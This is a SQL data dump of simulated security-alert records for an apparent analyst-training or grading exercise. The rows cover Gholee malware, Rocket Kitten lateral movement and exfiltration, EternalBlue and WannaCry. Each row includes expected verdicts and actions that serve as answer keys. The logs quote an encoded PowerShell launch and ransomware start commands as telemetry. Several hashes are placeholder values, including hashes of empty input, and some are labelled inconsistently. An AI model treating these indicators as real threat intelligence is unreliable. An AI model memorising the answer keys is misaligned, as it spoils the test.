(503, 'Execution of \'Gholee\' Malware Detected', 'high', 'Endpoint Detection and Response (EDR)', 'The execution of \'Gholee\' malware was detected on an endpoint following the opening of a malicious email attachment by an unsuspecting employee. This event signifies a potential compromise of the network with the likelihood of attackers establishing an initial foothold.', 'Malware Execution', 'T1204.002: User Execution: Malicious File', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:21:32Z\",\"event_id\":\"EDR-20231015-00123\",\"hostname\":\"workstation-12\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.1.45\",\"external_ip\":\"203.0.113.5\",\"file_name\":\"invoice_2023.pdf.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_id\":5678,\"parent_process\":\"explorer.exe\",\"action\":\"execute\",\"signature\":\"Gholee Malware\",\"severity\":\"high\"}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash of the executed \'Gholee\' malware file.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"invoice_2023.pdf.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious filename commonly used in phishing 
attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account of the employee who executed the malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(504, 'Establishment of Persistence Mechanisms', 'high', 'Log Analysis', 'The \'Gholee\' malware has been observed implementing various persistence techniques to maintain its foothold on the compromised system. Evidence of suspicious modifications to registry keys and the creation of new scheduled tasks were noted, indicating the attacker\'s attempt to remain undetected.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T03:45:12Z\",\"event_id\":\"4624\",\"source_ip\":\"172.16.254.1\",\"destination_ip\":\"10.0.0.25\",\"username\":\"compromised_user\",\"registry_change\":{\"key_path\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"value_name\":\"GholeeUpdater\",\"value_data\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Roaming\\\\Gholee\\\\gholee_updater.exe\"},\"scheduled_task\":{\"name\":\"Gholee Persistence Task\",\"task_file\":\"C:\\\\Windows\\\\System32\\\\Tasks\\\\Gholee\\\\task.xml\",\"creator_user\":\"compromised_user\"},\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"external_ip\":\"198.51.100.14\"}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with \'Gholee\' malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known threat 
actors.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"gholee_updater.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable file used for malware persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"172.16.254.1\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"GholeeUpdater\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Gholee\\\\\\\\gholee_updater.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"Gholee Persistence Task\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\Gholee\\\\\\\\task.xml\\\",\\\"creator_user\\\":\\\"compromised_user\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"172.16.254.1\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"GholeeUpdater\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Gholee\\\\\\\\gholee_updater.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"Gholee Persistence Task\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\Gholee\\\\\\\\task.xml\\\",\\\"creator_user\\\":\\\"compromised_user\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"172.16.254.1\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"GholeeUpdater\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Gholee\\\\\\\\gholee_updater.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"Gholee Persistence 
Task\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\Gholee\\\\\\\\task.xml\\\",\\\"creator_user\\\":\\\"compromised_user\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"172.16.254.1\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"GholeeUpdater\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Gholee\\\\\\\\gholee_updater.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"Gholee Persistence Task\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\Gholee\\\\\\\\task.xml\\\",\\\"creator_user\\\":\\\"compromised_user\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.118Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:12Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"172.16.254.1\\\",\\\"destination_ip\\\":\\\"10.0.0.25\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"registry_change\\\":{\\\"key_path\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"value_name\\\":\\\"GholeeUpdater\\\",\\\"value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Gholee\\\\\\\\gholee_updater.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"Gholee Persistence Task\\\",\\\"task_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\Tasks\\\\\\\\Gholee\\\\\\\\task.xml\\\",\\\"creator_user\\\":\\\"compromised_user\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"external_ip\\\":\\\"198.51.100.14\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(505, 'Lateral Movement Detected Across Network', 'high', 'Network Traffic Analysis', 'With persistence established, Rocket Kitten moves laterally, probing for additional systems to compromise within the aerospace firm\'s network.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:30Z\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"10.20.30.40\",\"attacker_ip\":\"203.0.113.50\",\"username\":\"jdoe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"RocketKittenTool.exe\",\"event\":\"Lateral Movement Detected\",\"protocol\":\"SMB\",\"description\":\"Suspicious SMB traffic detected from 192.168.1.100 to 10.20.30.40 using compromised credentials.\",\"malware_family\":\"Rocket Kitten\",\"action_taken\":\"Traffic flagged for further analysis\"}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within the network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Rocket Kitten APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as Rocket Kitten tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"RocketKittenTool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_repository\",\"verdict\":\"malicious\",\"details\":\"File associated with Rocket Kitten 
operations.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_database\",\"verdict\":\"suspicious\",\"details\":\"User\'s credentials were used in a suspicious manner.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(506, 'Data Exfiltration Attempt Identified', 'high', 'Data Loss Prevention (DLP)', 'During the final stage of the operation, Rocket Kitten attempted to exfiltrate sensitive aerospace data to external servers. This activity was detected by the DLP system, indicating a high likelihood of data theft.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"DLP-EXFIL-20231015-001\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"detected_file\":\"aerospace_project_plan.pdf\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"protocol\":\"HTTPS\",\"action_taken\":\"Blocked\",\"alert_severity\":\"High\"}', '2026-01-06 01:24:23', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Rocket Kitten\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"aerospace_project_plan.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP System\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document targeted for exfiltration\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"clean\",\"details\":\"No known malicious activity associated with this hash\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"HR Database\",\"verdict\":\"internal\",\"details\":\"Employee account used in exfiltration 
attempt\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"detected_file\\\":\\\"aerospace_project_plan.pdf\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"alert_severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"detected_file\\\":\\\"aerospace_project_plan.pdf\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"alert_severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"detected_file\\\":\\\"aerospace_project_plan.pdf\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"alert_severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"detected_file\\\":\\\"aerospace_project_plan.pdf\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"alert_severity\\\":\\\"High\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-20231015-001\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"username\\\":\\\"jdoe\\\",\\\"detected_file\\\":\\\"aerospace_project_plan.pdf\\\",\\\"file_hash\\\":\\\"b1946ac92492d2347c6235b4d2611184\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Blocked\\\",\\\"alert_severity\\\":\\\"High\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(507, 'Initial Breach Detected via EternalBlue', 'critical', 'Network Intrusion Detection System (NIDS)', 'An advanced attack was detected leveraging the EternalBlue vulnerability to gain unauthorized access to vulnerable systems within the network. The attacker initiated the breach from a known malicious IP address, targeting internal IP addresses, and executed a payload associated with the exploit.', 'Vulnerability Exploitation', 'T1210 - Exploitation of Remote Services', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T07:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"event_type\":\"exploit_attempt\",\"vulnerability\":\"EternalBlue\",\"payload_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"detected_by\":\"NIDS\",\"filename\":\"exploit.dll\",\"username\":\"unknown\"}', '2026-01-06 01:34:24', '2026-02-16 18:19:05', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with EternalBlue payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in exploit 
attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(508, 'Malicious Code Execution Initiated', 'critical', 'Endpoint Detection and Response (EDR)', 'An advanced remote code execution attempt has been detected. The attacker has initiated the WannaCry ransomware payload, beginning the encryption process on compromised systems.', 'Remote Code Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":\"edr_456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.102\",\"source_port\":443,\"destination_port\":135,\"protocol\":\"TCP\",\"username\":\"compromised_user\",\"executed_command\":\"c:\\\\windows\\\\system32\\\\cmd.exe /c start wannacry.exe\",\"file_hash\":\"3f2efc7f4c0a3b8ff2e8e4d3b6bb6a8f\",\"file_path\":\"C:\\\\Users\\\\compromised_user\\\\Downloads\\\\wannacry.exe\",\"process_id\":12345,\"malware_name\":\"WannaCry\"}', '2026-01-06 01:34:24', '2026-02-16 18:19:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with WannaCry attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f2efc7f4c0a3b8ff2e8e4d3b6bb6a8f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches WannaCry ransomware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"wannacry.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal EDR\",\"verdict\":\"malicious\",\"details\":\"Known ransomware payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active 
Directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(509, 'Persistence Mechanism Established', 'high', 'System Logs', 'The attacker has established persistence on the compromised systems by modifying registry keys and creating scheduled tasks, ensuring the ransomware re-executes upon reboot.', 'Persistence', 'T1547.001 - Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:30Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host.local\",\"user\":\"malicious_user\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"registry_key_modified\":\"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"scheduled_task_created\":\"\\\\Windows\\\\System32\\\\Tasks\\\\MaliciousTask\",\"malware_file\":\"ransomware_payload.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"description\":\"A malicious user has modified the Windows registry to ensure the ransomware payload executes at startup.\"}', '2026-01-06 01:34:24', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 